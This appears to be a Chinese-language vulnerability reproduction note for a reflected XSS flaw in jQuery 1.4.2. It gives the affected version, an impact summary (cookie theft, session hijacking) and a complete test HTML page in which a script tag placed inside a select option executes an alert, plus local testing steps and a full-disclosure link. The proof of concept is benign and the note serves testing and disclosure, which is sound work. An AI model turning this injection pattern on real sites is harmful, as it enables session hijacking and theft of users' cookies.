XSS Reflected JQuery 1.4.2 - Create object option in runtime client-side
影响版本:
JQuery-1.4.2
危害:
JQuery 'index.html'不正确过滤用户提交的输入,远程***者可以利用漏洞构建恶意URI,诱使用户解析,可获得敏感Cookie,劫持会话或在客户端上进行恶意操作。
测试:
启动nginx,并创建文件jquery-xss-reflected.com.br.html,内容为:
<!DOCTYPE html>
<! -- Mauro Risonho de Paula Assumpcao -->
<! -- aka firebits mauro.risonho () gmail com -->
<! -- Exploit jQuery JavaScript Library v1.4.2 -->
<! -- 01.09.2014 18:07:14 SaoPaulo/Brazil -->
<! -- _____.__ ___. .__ __
-->
<! -- _/ ____\__|______ ____\_ |__ |__|/ |_ ______ -->
<! -- \ __\| \_ __ \_/ __ \| __ \| \ __\/ ___/ -->
<! -- | | | || | \/\ ___/| \_\ \ || | \___ \ -->
<! -- |__| |__||__| \___ |___ /__||__| /____ | -->
<! -- \/ \/ \/ -->
<! -- bits on fire - 1989-2014 - brazil -->
<! -- -->
<! -- * jQuery JavaScript Library v1.4.2 -->
<! -- * http://jquery.com/ -->
<! -- * -->
<! -- * Copyright 2010, John Resig -->
<! -- * Dual licensed under the MIT or GPL Version 2 licenses. -->
<! -- * http://jquery.org/license -->
<! -- * -->
<! -- * Includes Sizzle.js -->
<! -- * http://sizzlejs.com/ -->
<! -- * Copyright 2010, The Dojo Foundation
-->
<! -- * Released under the MIT, BSD, and GPL Licenses. -->
<! -- * -->
<! -- * Date: Sat Feb 13 22:33:48 2010 -0500 -->
<! -- */ -->
<html>
<head>
<meta charset="utf-8">
<title>XSS Reflected - Jquery 1.4.2 </title>
<script src="https://code.jquery.com/jquery-1.4.2.js"></script>
<script>
$(function() {
$('#users').each(function() {
var select = $(this);
var option = select.children('option').first();
select.after(option.text());
select.hide();
});
});
</script>
</head>
<body>
<form method="post">
<p>
<select id="users" name="users">
<option value="x***eflected"><script>alert('x***eflected - jquery 1.4.2 by - 01.09.2014 18:07:14 Sao Paulo/Brazil@firebitsbr - mauro.risonho () gmail com');</script></option>
</select>
</p>
</form>
</body>
</html>
访问地址:
http://localhost/jquery-xss-reflected.com.br.html
测试截图:
相关连接地址:
http://seclists.org/fulldisclosure/2014/Sep/10
